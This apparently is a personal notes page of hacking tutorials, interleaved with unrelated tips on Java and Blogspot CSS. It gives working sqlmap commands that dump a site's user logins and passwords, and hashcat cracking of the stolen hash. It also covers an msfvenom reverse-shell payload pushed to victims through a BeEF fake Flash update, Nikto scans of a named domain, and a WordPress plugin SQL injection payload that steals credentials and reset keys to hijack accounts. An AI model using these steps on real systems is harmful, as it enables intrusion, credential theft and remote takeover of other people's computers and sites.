Hacking Kali Linux

https://www.darkmoreops.com/

Use SQLMAP SQL Injection to hack a website and database in Kali Linux

Use SQLMAP SQL Injection to hack a website and database in Kali Linux
Find vulnerable website - Google Dorks strings to find Vulnerable SQLMAP SQL injectable website
root@kali: sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs
In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)
–dbs = Enumerate DBMS databases

root@kali: sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables
root@kali: sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns
root@kali: sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump
root@kali: sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

Cracking password
Identify hash type
root@kali: hash-identifier
root@kali: cudahashcat --help | grep DES
I saved the hash value 24iYBc17xK0e. in DES.hash file. root@kali: cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

Run Java using CMD

Download Latest Java

• Download and install the latest version of the Java Platform, Standard Edition Development Kit (Java SE 6 Update 27). Note the installation directory for later—probably something like C:\Program Files\Java\jdk1.6.0_27\bin.

Config Java path in Computer Properties>Environment Variables

• Select Start -> Computer -> System Properties -> Advanced system settings -> Environment Variables -> System variables -> PATH.
• Prepend C:\Program Files\Java\jdk1.6.0_27\bin; to the beginning of the PATH variable.
• Click OK three times.
• check java version
• C:\Users\username>java -version

• C:\Users\username>javac -version

Customize CMD

• Set Layout -> Screen Buffer Size to 80 x 500.
• Select Options -> Edit Options -> QuickEdit Mode.
• Select Options -> Edit Options -> Insert Mode.

Compile and Execute

• C:\Users\username>cd c:\introcs\hello

• C:\introcs\hello\>

• C:\introcs\hello\>javac HelloWorld.java
  

• C:\introcs\hello\>

• C:\introcs\hello\>java HelloWorld
  

Hack / Control Anyone's PC with BeEF | Kali Linux | Tutorial | 2017

BeEF
root@kali:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=443 x > /root/Desktop/payload.exe
root@kali:clear
root@kali:cd /usr/sharebeef-xss/
root@kali:./beef


Open msfconsole
msf>use exploit/multi/handler
msf>exploit(handler)>show options
msf>set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf>exploit(handler)>set LHOST 192.168.1.105
LHOST=>192.168.1.105
msf>exploit(handler)>set LPORT 443
LPORT=443
msf>show options
msf>exploit
make simple fake download page
transfer created payload from desktop to var/www/html
copy Hook URL:[ip address] from ./beef results and pased it in index.html

index.html from var/www/html [see screenshot below]

visit the BeEf website UI [192.168.1.105:3000/ui/panel - can view from ./beef results]
login beef/beef usernamea and password

open cmd:
root@kali: service apache2 start
open browser and type 192.168.1.105
go to BeEF Control Panel from browser tab
select online browsers>192.168.1.105>192.168.1.105>click Commands tab
click Social Engineering folder>select Fake Flash Update
update image: http://your ip
update custom payload URL: http://your ip
click execute
once victim will download it.. youll recieve a meterpreter session.
to interact with the meterpreter session just type:
sessions -i L
[this will interact with the meterpreter session "l", if you want to see a list of sessionts just type: sessions]
type "Help" or "?" to have a full list of usefull commands to control your victim's computer]

Nikto Kali Linux

how to use nikto
go to applications>Vulnerability Analysis>nikto
root@kali:nikto
root@kali:nikto -H
root@kali:nikto -h http://hongtonggas.co.th/
sample displayed with vulnerable:
+ /profile.php?u=ggeFUuyt: Potential PHP MySQL database connection string found.
root@kali:nikto -h http://hongtonggas.co.th/ -Tuning 9

Add CSS file in Blogspot.com

Add css file in blogspot.com 1.create css file using notepad and save with .css extension(encoding: UTF-8) 2.create folder in google drive and upload the created .css and .js file 3.select file by ticking checkboxes and share it in public view 4.Following code should be change: *orig https://drive.google.com/file/d/0B4n9GL3eVuV-TkphMkc3SFR2Slk/edit?usp=sharing *https://googledrive.com/host/0B4n9GL3eVuV-TkphMkc3SFR2Slk 5.go to template html code and paste below format code under tags

Hack WP using sql injection

STEP 1 – Find out Vulnerabilities in WordPress Website
-1 union Select 1,2,3,4,5,6,group_concat(user_login,----,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users
  *desc[union query that fetch all db from wp_users table(to user user admin)]

http://{Domain_Name_Here}/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid={union Query here}
 *desc[$_pid variables]
 *desc[all-video-gallery plugins(w/ vulnerabilities)]

if u append
"SELECT * FROM ".$wpdb->;prefix."allvideogallery_profiles WHERE id=-1 union Select 1,2,3,4,5,6,group_concat(user_login,0xa,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users


STEP 2 – Reset WordPress Password and Get Activation Key
-1 union Select 1,2,3,4,5,6,group_concat(user_login,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users]
 *desc [activation code will display in <buffer>activation code here</buffer>]

STEP 3 – Use Activation key and Reset Password
link http://{DOMAIN_NAME_HERE}/wp-login.php?action=rp&key={ACTIVATION_KEY_HERE}&login={USERNAME_HERE}